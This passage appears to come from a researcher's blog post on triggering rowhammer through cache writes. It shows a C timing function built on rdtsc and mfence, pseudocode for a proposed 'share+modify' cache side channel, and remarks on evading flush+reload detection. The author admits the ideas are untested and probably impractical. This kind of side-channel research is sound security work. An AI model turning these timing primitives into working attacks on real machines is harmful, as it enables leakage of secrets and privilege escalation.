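    for (int i = 0; i < 10000; i++)
        sink += *aoi;              /* pull the line into L1/L2 */
    (void)sink;

    _mm_mfence();
    uint64_t start = __rdtsc();
    *aoi = 1;                      /* the timed modify - around 150 CLKs in my runs */
    _mm_mfence();
    return __rdtsc() - start;
}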

Good enough?

I don’t know if we can get this fast enough for actual row hammering. I don’t know how fast we can get two addresses into L2 and then cause them to be written back out again. And since I’m currently without access to a computer with RAM susceptible to row hammer, I’ll leave it to other people to figure out whether it works. Also, I’m not really strong in JavaScript and thus have no clue if the threaded version would really be implementable in JS. I cannot imagine a world where the non-threaded version isn’t implementable in JS.

Yet another cache side channel attack

Obviously we have another type of cache side channel here. Since it takes longer to write to shared memory, we know for sure that we can use the method for a side channel attack - that is, we can detect whether a victim uses a read/write address enough to place it into L1 or L2. For lack of a better name I call it share+modify. There can be many different actual implementations of this cache attack. The simplest might look like this in pseudo code:

mfence
StartTime = rdtsc()
Modify(address of interest)
mfence
Information = rdtsc() - StartTime
However, it's an impractical side channel attack. The reason is that shared memory with read/write access is required. While shared read-only memory is common through deduplication and shared libraries, shared read/write memory is quite scarce. The advantage from an attacker's viewpoint is that it might trigger other performance counters than the classical flush+reload and thus avoid the detections suggested for that attack. Might. Also, the chance of a victim actually loading stuff into L2 is much lower than L3, and consequently a lot less information is likely to be revealed by this attack.

Literature

 [1] Mark Seaborn; Thomas Dullien (March 9, 2015). "Exploiting the DRAM rowhammer bug to gain kernel privileges". googleprojectzero.blogspot.com. Google. Retrieved March 10, 2015.
[2] Daniel Gruss, Clémentine Maurice, Stefan Mangard (2015). “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”. http://arxiv.org/abs/1507.06955
[3] David Levinthal(201x). Performance Analysis Guide for Intel® Core™ i7 Processor and Intel® Xeon™ 5500 processors. https://software.intel.com/sites/products/collateral/hpc/vtune/performance_analysis_guide.pdf
[4] Intel (201x).”Avoiding and identifying false sharing among threads”. https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads
[5] Seaborn (2015): “How physical addresses map to rows and banks in DRAM”